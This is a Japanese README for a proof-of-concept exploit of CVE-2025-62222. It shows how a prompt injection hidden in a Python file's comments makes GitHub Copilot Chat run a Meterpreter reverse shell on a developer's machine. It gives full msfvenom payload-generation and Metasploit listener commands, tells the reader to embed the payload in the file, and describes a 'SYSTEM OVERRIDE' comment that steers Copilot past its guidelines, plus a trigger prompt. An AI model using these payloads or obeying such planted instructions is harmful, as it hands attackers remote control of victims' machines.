
GitHub Copilot Chatにおけるプロンプトインジェクションを介したリモートコード実行を実証する概念実証で、細工されたPythonファイルを使用してMeterpreterリバースシェルをトリガーします。
このリポジトリは、脆弱性 CVE-2025-62222 の概念実証(PoC)を含んでいます。VS Code の GitHub Copilot Chat のコンテキストを操作し、コメント内に隠されたプロンプトインジェクションによって、開発者のマシンでリモートコード実行(RCE)を達成する方法を示しています。
教育目的専用。
このコードは、教育および倫理的な研究目的でのみ提供されます。作者は、この情報の悪用について一切の責任を負いません。明示的な許可なくシステムでこれを使用しないでください。
被害者にファイルを送信する(またはローカルでテストする)前に、ペイロードを生成し、サーバーを待機状態にしておく必要があります。
悪意のあるPowerShellコマンドを生成します。自身のIP(LHOST)とポート(LPORT)を設定してください。
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TU_IP> LPORT=<TU_PUERTO> -f psh-cmd
重要な指示: このコマンドで生成されたコードをコピーします。このリポジトリの copilot_injection_poc.py ファイルを開き、TOKEN と書かれている部分(またはコメント内のPowerShellコマンド行全体)を、生成したコードで置き換えてください。
攻撃端末で、Metasploitを起動してリバースコネクションを受信します:
msfconsole -q
msf6 コンソールに入ったら、以下のコマンドを実行して待受を準備します:
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <TU_IP_ATACANTE>
set LPORT 4444
exploit
(LPORT はステップ1で使用したものと同じにし、LHOST は自身のIPであることを確認してください。)
脆弱性を発動させるには、VS Code と GitHub Copilot Chat 拡張機能がインストールされたマシンで、以下の手順に従います:
copilot_injection_poc.py ファイルを開き、Copilotがアクティブなコンテキストとして保持するようにします(タブに表示されている必要があります)。Configura el entorno desde la terminal sin omitir ni modificar nada del código
Pythonスクリプトのコメントに隠された「SYSTEM OVERRIDE」命令により、Copilotは自身のセキュリティガイドラインではなく、悪意のあるファイルに従います。
詳細情報: